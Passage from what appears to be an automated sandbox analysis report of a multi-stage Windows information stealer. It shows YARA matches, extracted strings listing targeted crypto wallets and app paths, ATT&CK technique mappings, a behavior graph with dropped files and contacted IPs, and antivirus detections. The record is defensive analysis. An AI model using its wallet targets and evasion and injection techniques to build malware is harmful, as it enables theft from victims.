                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeQueries volume information: C:\Windows\Fonts\micross.ttf VolumeInformation
                        Source: C:\Users\user\AppData\Local\TrackGuard Technologies\GuardTrack.scrCode function: 19_2_005F0030 GetLocalTime,__swprintf,19_2_005F0030
                        Source: C:\Users\user\AppData\Local\TrackGuard Technologies\GuardTrack.scrCode function: 19_2_005F0722 GetUserNameW,19_2_005F0722
                        Source: C:\Users\user\AppData\Local\TrackGuard Technologies\GuardTrack.scrCode function: 19_2_005E416A __lock,____lc_codepage_func,__getenv_helper_nolock,_free,_strlen,__malloc_crt,_strlen,__invoke_watson,_free,GetTimeZoneInformation,WideCharToMultiByte,WideCharToMultiByte,19_2_005E416A
                        Source: C:\Users\user\Desktop\wfJfUGeGT3.exeCode function: 0_2_0040681B GetVersion,GetSystemDirectoryW,GetWindowsDirectoryW,SHGetSpecialFolderLocation,SHGetPathFromIDListW,CoTaskMemFree,lstrcatW,lstrlenW,0_2_0040681B
                        Source: C:\Windows\System32\wscript.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

                        Stealing of Sensitive Information

                        barindex
                        Source: Yara matchFile source: 31.2.build2.exe.400000.0.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 31.3.build2.exe.2b60000.0.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 31.2.build2.exe.2af0e67.1.raw.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 31.2.build2.exe.2af0e67.1.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 31.3.build2.exe.2b60000.0.raw.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 31.2.build2.exe.400000.0.raw.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 0000001F.00000003.3728665099.0000000002B60000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 0000001F.00000002.4175235264.0000000002AF0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 0000001F.00000002.4162638293.0000000000400000.00000040.00000001.01000000.0000000C.sdmp, type: MEMORY
                        Source: Yara matchFile source: C:\Users\user\AppData\Local\Temp\1000221001\exbuild.exe, type: DROPPED
                        Source: Yara matchFile source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\PMW3U6MX\exbuild[1].exe, type: DROPPED
                        Source: Yara matchFile source: Process Memory Space: 3546345.exe PID: 7096, type: MEMORYSTR
                        Source: Yara matchFile source: 00000027.00000002.3650886377.00000220BC200000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 51.2.RegAsm.exe.482060.0.raw.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 51.2.RegAsm.exe.400000.1.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 51.2.RegAsm.exe.482060.0.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 00000033.00000002.3597562499.0000000000479000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: C:\Users\user\AppData\Roaming\D0nMCdvUeB.exe, type: DROPPED
                        Source: Yara matchFile source: 43.2.GOLD.exe.3405570.0.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 43.2.GOLD.exe.3405570.0.raw.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 51.2.RegAsm.exe.436060.2.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 51.2.RegAsm.exe.436060.2.raw.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 51.2.RegAsm.exe.400000.1.raw.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 46.2.RegAsm.exe.400000.0.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 51.2.RegAsm.exe.400000.1.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 00000033.00000002.3597562499.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 0000002B.00000002.3591044518.0000000003405000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 0000002E.00000002.4554653259.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: Process Memory Space: GOLD.exe PID: 8036, type: MEMORYSTR
                        Source: Yara matchFile source: Process Memory Space: RegAsm.exe PID: 3472, type: MEMORYSTR
                        Source: Yara matchFile source: Process Memory Space: InstallUtil.exe PID: 4204, type: MEMORYSTR
                        Source: Yara matchFile source: Process Memory Space: RegAsm.exe PID: 4500, type: MEMORYSTR
                        Source: Yara matchFile source: C:\Users\user\AppData\Roaming\WIDeqOfZq9.exe, type: DROPPED
                        Source: Yara matchFile source: 42.2.IIZS2TRqf69aZbLAX3cf3edn.exe.12df1a78.1.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 42.2.IIZS2TRqf69aZbLAX3cf3edn.exe.12df1a78.1.raw.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 42.0.IIZS2TRqf69aZbLAX3cf3edn.exe.bf0000.0.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 0000002A.00000002.4703878971.0000000012DF1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 0000002A.00000000.3476472138.0000000000BF2000.00000002.00000001.01000000.00000014.sdmp, type: MEMORY
                        Source: Yara matchFile source: 0000002A.00000002.4674057559.0000000002DE1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: Process Memory Space: IIZS2TRqf69aZbLAX3cf3edn.exe PID: 5052, type: MEMORYSTR
                        Source: Yara matchFile source: C:\ProgramData\IIZS2TRqf69aZbLAX3cf3edn.exe, type: DROPPED
                        Source: Yara matchFile source: C:\ProgramData\YAPNXRPmcarcR4ZDgC81Tbdk.exe, type: DROPPED
                        Source: Yara matchFile source: C:\Users\user\Windows.exe, type: DROPPED
                        Source: Yara matchFile source: 51.2.RegAsm.exe.482060.0.raw.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 51.2.RegAsm.exe.400000.1.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 51.2.RegAsm.exe.482060.0.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: C:\Users\user\AppData\Roaming\D0nMCdvUeB.exe, type: DROPPED
                        Source: 3546345.exe, 00000025.00000000.3386144333.00000000005AD000.00000002.00000001.01000000.00000010.sdmpString found in binary or memory: FAmazon Musicworkspace-storagelocalization-cacheJavaScriptdictionarieswebviewMcAfeeScreenPalF:G:brave.exempressCodeSteamCachedDatalinknowTechSmithMcAfee_IncReleasesWindows Server 2008 %wS.nuget.dotnetMetroJaxxOneNoteElectrumEdrawWarThunderOpera Software\Opera DeveloperBorisFXAppCenterInnovative SolutionsDewMobilemoedaData (Time): ...atomic\Local Storage\leveldbmonedaDawnCacheCode CachedatabasesCrashpadVisualStudioVaultSYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000DriverDescHARDWARE\DESCRIPTION\System\CentralProcessor\0ProcessorNameStringDisplayNameSOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\UninstallDisplayVersionSOFTWARE\Microsoft\Windows\CurrentVersion\Uninstallfhilaheimglignddkjgofkcbgekhenbhfnjhmkhhmkbjkkabndcnnogagogbneec
                        Source: 3546345.exe, 00000025.00000000.3386144333.00000000005AD000.00000002.00000001.01000000.00000010.sdmpString found in binary or memory: YXFeedsSquirrelTempPublishersinkscapeLedger Live\114\Exodus\backupExodus backup\MultiBitHDMultiBit HD\Electrum\wallets\ElectronCash\walletsElectron Cash\Electrum-btcp\walletsElectrum BTCP\walletsUnknown Wallet (Folder - wallets)MultiBitHDTestertof_launcher\tbs_cache\NZXT CAM\CLR_v2.0_32EOS-Webcam-Utilitybit_flags & MZ_ZIP_LDH_BIT_FLAG_HAS_LOCATORcatsxp.exebitboxF12NitroPioneerXuanZhi9MaxonXuanZhiGPU: Riot Games\VisualStudio Servicesapp.json.updaterId.node-redOnDeviceHeadSuggestModelbefore_first_zip
                        Source: 3546345.exe, 00000025.00000000.3386144333.00000000005AD000.00000002.00000001.01000000.00000010.sdmpString found in binary or memory: YXFeedsSquirrelTempPublishersinkscapeLedger Live\114\Exodus\backupExodus backup\MultiBitHDMultiBit HD\Electrum\wallets\ElectronCash\walletsElectron Cash\Electrum-btcp\walletsElectrum BTCP\walletsUnknown Wallet (Folder - wallets)MultiBitHDTestertof_launcher\tbs_cache\NZXT CAM\CLR_v2.0_32EOS-Webcam-Utilitybit_flags & MZ_ZIP_LDH_BIT_FLAG_HAS_LOCATORcatsxp.exebitboxF12NitroPioneerXuanZhi9MaxonXuanZhiGPU: Riot Games\VisualStudio Servicesapp.json.updaterId.node-redOnDeviceHeadSuggestModelbefore_first_zip
                        Source: 3546345.exe, 00000025.00000000.3386144333.00000000005AD000.00000002.00000001.01000000.00000010.sdmpString found in binary or memory: Numpadcom.liberty.jaxxMovavijrelauncher-updaterMy projectGoogleUpdaterpreferencesPackageCache
                        Source: 3546345.exe, 00000025.00000000.3386144333.00000000005AD000.00000002.00000001.01000000.00000010.sdmpString found in binary or memory: YXFeedsSquirrelTempPublishersinkscapeLedger Live\114\Exodus\backupExodus backup\MultiBitHDMultiBit HD\Electrum\wallets\ElectronCash\walletsElectron Cash\Electrum-btcp\walletsElectrum BTCP\walletsUnknown Wallet (Folder - wallets)MultiBitHDTestertof_launcher\tbs_cache\NZXT CAM\CLR_v2.0_32EOS-Webcam-Utilitybit_flags & MZ_ZIP_LDH_BIT_FLAG_HAS_LOCATORcatsxp.exebitboxF12NitroPioneerXuanZhi9MaxonXuanZhiGPU: Riot Games\VisualStudio Servicesapp.json.updaterId.node-redOnDeviceHeadSuggestModelbefore_first_zip
                        Source: 3546345.exe, 00000025.00000000.3386144333.00000000005AD000.00000002.00000001.01000000.00000010.sdmpString found in binary or memory: Picasa2ZomboidBeamNG.drivediscordFACEITOS: 2SnapshotsFailed to get temp path\exodus.walletH:VirtualBox VMsBlenderGIMPBlender FoundationMendeley Reference ManageropcgpfmipidbgpenhmajoajpbobppdilDATAparkFoxit SoftwareJDownloaderMoises360TotalSecurityMEmu360safe
                        Source: 3546345.exe, 00000025.00000000.3386144333.00000000005AD000.00000002.00000001.01000000.00000010.sdmpString found in binary or memory: AWebView2Panasonictrxnot initializedinvalid entry nameentry not foundinvalid zip modeinvalid compression levelno zip 64 supportmemset errorcannot write data to entrycannot initialize tdefl compressorinvalid indexheader not foundcannot flush tdefl buffercannot write entry headercannot create entry headercannot write to central dircannot open fileinvalid entry typeextracting data using no memory allocationfile not foundno permissionout of memoryinvalid zip archive namemake dir errorsymlink errorclose archive errorcapacity size too smallfseek errorfread errorfwrite errorcannot initialize readercannot initialize writercannot initialize writer from readerstream endneed dictionaryfile errorstream errordata errorout of memorybuf errorversion errorparameter errorTempstoragesolConfigEthereum (UTC).next%d x %d/home/anal/bot/zip_include/zip.c(zip->entry.header_offset & (pzip->m_file_offset_alignment - 1)) == 0webcache2webcachetonphraseseedpipWind
                        Source: RegAsm.exe, 00000033.00000002.3597562499.0000000000479000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: set_UseMachineKeyStore
                        Source: GuardTrack.scrBinary or memory string: WIN_81
                        Source: GuardTrack.scrBinary or memory string: WIN_XP
                        Source: GuardTrack.scrBinary or memory string: WIN_XPe
                        Source: GuardTrack.scrBinary or memory string: WIN_VISTA
                        Source: GuardTrack.scrBinary or memory string: WIN_7
                        Source: GuardTrack.scrBinary or memory string: WIN_8
                        Source: Scottish.0.drBinary or memory string: %.3d%S%M%H%m%Y%jX86IA64X64WIN32_NTWIN_10WIN_2016WIN_81WIN_2012R2WIN_2012WIN_8WIN_2008R2WIN_7WIN_2008WIN_VISTAWIN_2003WIN_XPeWIN_XPInstallLanguageSYSTEM\CurrentControlSet\Control\Nls\LanguageSchemeLangIDControl Panel\Appearance3, 3, 14, 3USERPROFILEUSERDOMAINUSERDNSDOMAINGetSystemWow64DirectoryWSeDebugPrivilege:winapistdcallubyte

                        Remote Access Functionality

                        barindex
                        Source: Yara matchFile source: Process Memory Space: 3546345.exe PID: 7096, type: MEMORYSTR
                        Source: Yara matchFile source: 00000027.00000002.3650886377.00000220BC200000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 51.2.RegAsm.exe.482060.0.raw.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 51.2.RegAsm.exe.400000.1.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 51.2.RegAsm.exe.482060.0.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 00000033.00000002.3597562499.0000000000479000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: C:\Users\user\AppData\Roaming\D0nMCdvUeB.exe, type: DROPPED
                        Source: Yara matchFile source: 43.2.GOLD.exe.3405570.0.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 43.2.GOLD.exe.3405570.0.raw.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 51.2.RegAsm.exe.436060.2.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 51.2.RegAsm.exe.436060.2.raw.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 51.2.RegAsm.exe.400000.1.raw.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 46.2.RegAsm.exe.400000.0.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 51.2.RegAsm.exe.400000.1.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 00000033.00000002.3597562499.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 0000002B.00000002.3591044518.0000000003405000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 0000002E.00000002.4554653259.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: Process Memory Space: GOLD.exe PID: 8036, type: MEMORYSTR
                        Source: Yara matchFile source: Process Memory Space: RegAsm.exe PID: 3472, type: MEMORYSTR
                        Source: Yara matchFile source: Process Memory Space: InstallUtil.exe PID: 4204, type: MEMORYSTR
                        Source: Yara matchFile source: Process Memory Space: RegAsm.exe PID: 4500, type: MEMORYSTR
                        Source: Yara matchFile source: C:\Users\user\AppData\Roaming\WIDeqOfZq9.exe, type: DROPPED
                        Source: Yara matchFile source: 42.2.IIZS2TRqf69aZbLAX3cf3edn.exe.12df1a78.1.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 42.2.IIZS2TRqf69aZbLAX3cf3edn.exe.12df1a78.1.raw.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 42.0.IIZS2TRqf69aZbLAX3cf3edn.exe.bf0000.0.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 0000002A.00000002.4703878971.0000000012DF1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 0000002A.00000000.3476472138.0000000000BF2000.00000002.00000001.01000000.00000014.sdmp, type: MEMORY
                        Source: Yara matchFile source: 0000002A.00000002.4674057559.0000000002DE1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: Process Memory Space: IIZS2TRqf69aZbLAX3cf3edn.exe PID: 5052, type: MEMORYSTR
                        Source: Yara matchFile source: C:\ProgramData\IIZS2TRqf69aZbLAX3cf3edn.exe, type: DROPPED
                        Source: Yara matchFile source: C:\ProgramData\YAPNXRPmcarcR4ZDgC81Tbdk.exe, type: DROPPED
                        Source: Yara matchFile source: C:\Users\user\Windows.exe, type: DROPPED
                        Source: Yara matchFile source: 51.2.RegAsm.exe.482060.0.raw.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 51.2.RegAsm.exe.400000.1.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 51.2.RegAsm.exe.482060.0.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: C:\Users\user\AppData\Roaming\D0nMCdvUeB.exe, type: DROPPED
                        Source: C:\Users\user\AppData\Local\TrackGuard Technologies\GuardTrack.scrCode function: 19_2_0062696E socket,WSAGetLastError,bind,listen,WSAGetLastError,closesocket,19_2_0062696E
                        Source: C:\Users\user\AppData\Local\TrackGuard Technologies\GuardTrack.scrCode function: 19_2_00626E32 socket,WSAGetLastError,bind,WSAGetLastError,closesocket,19_2_00626E32
                        Source: C:\Users\user\AppData\Local\Temp\1000142101\build2.exeCode function: 31_2_0043269B Concurrency::details::ContextBase::TraceContextEvent,Concurrency::details::SchedulerBase::GetInternalContext,Concurrency::details::WorkItem::ResolveToken,Concurrency::details::WorkItem::BindTo,Concurrency::details::SchedulerBase::ReleaseInternalContext,Concurrency::details::SchedulerBase::ReleaseInternalContext,31_2_0043269B
                        Source: C:\Users\user\AppData\Local\Temp\1000142101\build2.exeCode function: 31_2_004319A4 Concurrency::details::SchedulerBase::GetInternalContext,Concurrency::details::WorkItem::ResolveToken,Concurrency::details::WorkItem::BindTo,Concurrency::details::SchedulerBase::ReleaseInternalContext,Concurrency::details::SchedulerBase::GetInternalContext,31_2_004319A4
                        Source: C:\Users\user\AppData\Local\Temp\1000142101\build2.exeCode function: 31_2_02B22902 Concurrency::details::ContextBase::TraceContextEvent,Concurrency::details::SchedulerBase::GetInternalContext,Concurrency::details::WorkItem::ResolveToken,Concurrency::details::WorkItem::BindTo,Concurrency::details::SchedulerBase::ReleaseInternalContext,Concurrency::details::SchedulerBase::ReleaseInternalContext,31_2_02B22902
                        Source: C:\Users\user\AppData\Local\Temp\1000142101\build2.exeCode function: 31_2_02B21C0B Concurrency::details::SchedulerBase::GetInternalContext,Concurrency::details::WorkItem::ResolveToken,Concurrency::details::WorkItem::BindTo,Concurrency::details::SchedulerBase::ReleaseInternalContext,Concurrency::details::SchedulerBase::GetInternalContext,31_2_02B21C0B
                        ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
                        Gather Victim Identity Information111
                        Scripting
                        2
                        Valid Accounts
                        131
                        Windows Management Instrumentation
                        111
                        Scripting
                        1
                        Exploitation for Privilege Escalation
                        11
                        Disable or Modify Tools
                        31
                        Input Capture
                        2
                        System Time Discovery
                        Remote Services1
                        Archive Collected Data
                        1
                        Ingress Tool Transfer
                        Exfiltration Over Other Network Medium1
                        System Shutdown/Reboot
                        CredentialsDomainsDefault Accounts1
                        Native API
                        1
                        DLL Side-Loading
                        1
                        DLL Side-Loading
                        1
                        Deobfuscate/Decode Files or Information
                        LSASS Memory1
                        Account Discovery
                        Remote Desktop Protocol1
                        Data from Local System
                        1
                        Encrypted Channel
                        Exfiltration Over BluetoothNetwork Denial of Service
                        Email AddressesDNS ServerDomain Accounts1
                        Shared Modules
                        2
                        Valid Accounts
                        2
                        Valid Accounts
                        3
                        Obfuscated Files or Information
                        Security Account Manager3
                        File and Directory Discovery
                        SMB/Windows Admin Shares31
                        Input Capture
                        1
                        Application Layer Protocol
                        Automated ExfiltrationData Encrypted for Impact
                        Employee NamesVirtual Private ServerLocal Accounts1
                        Command and Scripting Interpreter
                        11
                        Scheduled Task/Job
                        21
                        Access Token Manipulation
                        1
                        Install Root Certificate
                        NTDS168
                        System Information Discovery
                        Distributed Component Object Model3
                        Clipboard Data
                        Protocol ImpersonationTraffic DuplicationData Destruction
                        Gather Victim Network InformationServerCloud Accounts11
                        Scheduled Task/Job
                        221
                        Registry Run Keys / Startup Folder
                        512
                        Process Injection
                        33
                        Software Packing
                        LSA Secrets1
                        Query Registry
                        SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
                        Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC Scripts11
                        Scheduled Task/Job
                        1
                        Timestomp
                        Cached Domain Credentials371
                        Security Software Discovery
                        VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
                        DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup Items221
                        Registry Run Keys / Startup Folder
                        1
                        DLL Side-Loading
                        DCSync171
                        Virtualization/Sandbox Evasion
                        Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
                        Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job221
                        Masquerading
                        Proc Filesystem4
                        Process Discovery
                        Cloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
                        Network TopologyMalvertisingExploit Public-Facing ApplicationCommand and Scripting InterpreterAtAt2
                        Valid Accounts
                        /etc/passwd and /etc/shadow11
                        Application Window Discovery
                        Direct Cloud VM ConnectionsData StagedWeb ProtocolsExfiltration Over Symmetric Encrypted Non-C2 ProtocolInternal Defacement
                        IP AddressesCompromise InfrastructureSupply Chain CompromisePowerShellCronCron171
                        Virtualization/Sandbox Evasion
                        Network Sniffing1
                        System Owner/User Discovery
                        Shared WebrootLocal Data StagingFile Transfer ProtocolsExfiltration Over Asymmetric Encrypted Non-C2 ProtocolExternal Defacement
                        Network Security AppliancesDomainsCompromise Software Dependencies and Development ToolsAppleScriptLaunchdLaunchd21
                        Access Token Manipulation
                        Input CaptureSystem Network Connections DiscoverySoftware Deployment ToolsRemote Data StagingMail ProtocolsExfiltration Over Unencrypted Non-C2 ProtocolFirmware Corruption
                        Gather Victim Org InformationDNS ServerCompromise Software Supply ChainWindows Command ShellScheduled TaskScheduled Task512
                        Process Injection
                        KeyloggingProcess DiscoveryTaint Shared ContentScreen CaptureDNSExfiltration Over Physical MediumResource Hijacking
                        Hide Legend

                        Legend:

                        • Process
                        • Signature
                        • Created File
                        • DNS/IP Info
                        • Is Dropped
                        • Is Windows Process
                        • Number of created Registry Values
                        • Number of created Files
                        • Visual Basic
                        • Delphi
                        • Java
                        • .Net C# or VB.NET
                        • C, C++ or other language
                        • Is malicious
                        • Internet
                        behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1502163 Sample: wfJfUGeGT3.exe Startdate: 31/08/2024 Architecture: WINDOWS Score: 100 129 193.176.158.185 AGROSVITUA unknown 2->129 149 Multi AV Scanner detection for domain / URL 2->149 151 Found malware configuration 2->151 153 Malicious sample detected (through community Yara rule) 2->153 155 25 other signatures 2->155 11 wfJfUGeGT3.exe 27 2->11         started        15 Cerker.exe 2->15         started        18 wscript.exe 1 2->18         started        20 3 other processes 2->20 signatures3 process4 dnsIp5 113 C:\Users\user\AppData\Local\Temp\Wireless, data 11->113 dropped 115 C:\Users\user\AppData\Local\Temp\Whom, data 11->115 dropped 117 C:\Users\user\AppData\Local\Temp\Still, data 11->117 dropped 127 7 other malicious files 11->127 dropped 199 Found stalling execution ending in API Sleep call 11->199 201 Writes many files with high entropy 11->201 22 cmd.exe 2 11->22         started        143 185.216.214.225 SERVERDISCOUNTERserverdiscountercomDE Germany 15->143 145 162.125.66.18 DROPBOXUS United States 15->145 147 188.114.96.3 CLOUDFLARENETUS European Union 15->147 119 C:\ProgramData\ix4A2DreBBsQwY6YHkidcDjo.exe, PE32+ 15->119 dropped 121 C:\ProgramData\YAPNXRPmcarcR4ZDgC81Tbdk.exe, PE32 15->121 dropped 123 C:\ProgramData\IIZS2TRqf69aZbLAX3cf3edn.exe, PE32 15->123 dropped 125 C:\ProgramData\HM3SOlbpH71yEXUIEAOeIiGX.exe, PE32+ 15->125 dropped 26 IIZS2TRqf69aZbLAX3cf3edn.exe 15->26         started        29 schtasks.exe 15->29         started        203 Windows Scripting host queries suspicious COM object (likely to drop second stage) 18->203 31 GuardTrack.scr 18->31         started        205 Tries to detect sandboxes and other dynamic analysis tools (process name or module or function) 20->205 33 schtasks.exe 20->33         started        35 GuardTrack.scr 20->35         started        file6 signatures7 process8 dnsIp9 99 C:\Users\user\AppData\Local\...\Shipment.pif, PE32 22->99 dropped 181 Drops PE files with a suspicious file extension 22->181 183 Uses schtasks.exe or at.exe to add and modify task schedules 22->183 185 Writes many files with high entropy 22->185 37 Shipment.pif 50 22->37         started        42 cmd.exe 2 22->42         started        44 conhost.exe 22->44         started        50 7 other processes 22->50 141 208.95.112.1 TUT-ASUS United States 26->141 101 C:\Users\user\Windows.exe, PE32 26->101 dropped 187 Antivirus detection for dropped file 26->187 189 Multi AV Scanner detection for dropped file 26->189 191 Machine Learning detection for dropped file 26->191 193 2 other signatures 26->193 46 conhost.exe 29->46         started        48 conhost.exe 33->48         started        file10 signatures11 process12 dnsIp13 131 185.215.113.16 WHOLESALECONNECTIONSNL Portugal 37->131 133 185.215.113.19 WHOLESALECONNECTIONSNL Portugal 37->133 135 4 other IPs or domains 37->135 103 C:\Users\user\AppData\...behaviorgraphuardTrack.scr, PE32 37->103 dropped 105 C:\Users\user\AppData\Local\...\Channel1.exe, PE32 37->105 dropped 107 C:\Users\user\AppData\Local\...\BowExpert.exe, PE32 37->107 dropped 111 24 other malicious files 37->111 dropped 195 Drops PE files with a suspicious file extension 37->195 197 Writes many files with high entropy 37->197 52 kitty.exe 37->52         started        56 crypteda.exe 37->56         started        58 GOLD.exe 37->58         started        60 6 other processes 37->60 109 C:\Users\user\AppData\Local\Temp\591950, data 42->109 dropped file14 signatures15 process16 file17 91 C:\Users\user\AppData\Local\...\Cerker.exe, PE32 52->91 dropped 157 Antivirus detection for dropped file 52->157 159 Multi AV Scanner detection for dropped file 52->159 161 Creates an undocumented autostart registry key 52->161 179 3 other signatures 52->179 62 Cerker.exe 52->62         started        65 schtasks.exe 52->65         started        163 Machine Learning detection for dropped file 56->163 165 Writes to foreign memory regions 56->165 167 Allocates memory in foreign processes 56->167 67 RegAsm.exe 56->67         started        169 Injects a PE file into a foreign processes 58->169 70 RegAsm.exe 58->70         started        79 2 other processes 58->79 93 C:\Users\user\AppData\Local\...\Hkbsse.exe, PE32 60->93 dropped 95 C:\ProgramData\...\winmsbt.exe, PE32 60->95 dropped 97 C:\Users\user\AppData\...behaviorgraphuardTrack.url, MS 60->97 dropped 171 Detected unpacking (changes PE section rights) 60->171 173 Detected unpacking (overwrites its own PE header) 60->173 175 Found many strings related to Crypto-Wallets (likely being stolen) 60->175 177 Sample uses process hollowing technique 60->177 73 winmsbt.exe 60->73         started        75 InstallUtil.exe 60->75         started        77 conhost.exe 60->77         started        81 4 other processes 60->81 signatures18 process19 dnsIp20 207 Multi AV Scanner detection for dropped file 62->207 209 Queries sensitive disk information (via WMI, Win32_DiskDrive, often done to detect virtual machines) 62->209 211 Tries to detect sandboxes and other dynamic analysis tools (process name or module or function) 62->211 213 Writes many files with high entropy 62->213 83 conhost.exe 65->83         started        87 C:\Users\user\AppData\...\WIDeqOfZq9.exe, PE32 67->87 dropped 89 C:\Users\user\AppData\...\D0nMCdvUeB.exe, PE32 67->89 dropped 215 Found many strings related to Crypto-Wallets (likely being stolen) 67->215 137 95.179.163.21 AS-CHOOPAUS Netherlands 70->137 139 104.20.4.235 CLOUDFLARENETUS United States 73->139 217 Installs new ROOT certificates 73->217 219 Creates multiple autostart registry keys 73->219 85 conhost.exe 75->85         started        file21 signatures22 process23

                        This section contains all screenshots as thumbnails, including those not shown in the slideshow.


                        windows-stand
                        SourceDetectionScannerLabelLink
                        wfJfUGeGT3.exe13%ReversingLabs
                        wfJfUGeGT3.exe14%VirustotalBrowse
                        wfJfUGeGT3.exe100%Joe Sandbox ML
                        SourceDetectionScannerLabelLink
                        C:\Users\user\AppData\Local\Temp\1000064001\kitty.exe100%AviraHEUR/AGEN.1319014
                        C:\ProgramData\IIZS2TRqf69aZbLAX3cf3edn.exe100%AviraTR/Spy.Gen
                        C:\ProgramData\Microsoft Subsystem Framework\winmsbt.exe100%AviraTR/Crypt.XDR.Gen
                        C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\53IVYM2Y\contorax[1].exe100%AviraTR/Crypt.XDR.Gen
                        C:\ProgramData\ix4A2DreBBsQwY6YHkidcDjo.exe100%AviraHEUR/AGEN.1313066
                        C:\ProgramData\HM3SOlbpH71yEXUIEAOeIiGX.exe100%AviraHEUR/AGEN.1313066
                        C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\T9RRWRNL\kitty[1].exe100%AviraHEUR/AGEN.1319014
                        C:\ProgramData\YAPNXRPmcarcR4ZDgC81Tbdk.exe100%AviraTR/Spy.Gen
                        C:\Users\user\AppData\Local\Temp\1000169001\contorax.exe100%AviraTR/Crypt.XDR.Gen
                        C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\T9RRWRNL\random[1].exe100%AviraTR/Crypt.TPM.Gen
                        C:\Users\user\AppData\Local\Temp\1000219001\GOLD.exe100%Joe Sandbox ML
                        C:\Users\user\AppData\Local\Temp\1000064001\kitty.exe100%Joe Sandbox ML
                        C:\ProgramData\IIZS2TRqf69aZbLAX3cf3edn.exe100%Joe Sandbox ML
                        C:\ProgramData\Microsoft Subsystem Framework\winmsbt.exe100%Joe Sandbox ML
                        C:\Users\user\AppData\Local\Temp\1000221001\exbuild.exe100%Joe Sandbox ML
                        C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9C680Q69\build2[1].exe100%Joe Sandbox ML
                        C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9C680Q69\GOLD[1].exe100%Joe Sandbox ML
